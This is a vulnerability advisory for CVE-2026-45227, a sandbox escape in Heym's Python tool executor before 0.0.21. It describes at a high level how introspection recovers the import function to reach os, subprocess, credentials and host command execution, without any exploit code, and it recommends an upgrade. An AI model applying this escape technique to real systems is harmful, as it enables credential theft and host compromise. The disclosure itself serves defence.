CVE-2026-45227

Name of the Vulnerable Software and Affected Versions Heym versions prior to 0.0.21

Description A sandbox escape exists in the custom Python tool executor. Authenticated workflow authors can bypass sandbox restrictions using object-graph introspection primitives. By employing Python introspection techniques, attackers can recover the unrestricted import function to import blocked modules, such as os and subprocess. This allows access to inherited backend environment variables containing database credentials and encryption keys, enabling the execution of arbitrary host commands as the backend service user.

Recommendations Update to version 0.0.21 or later.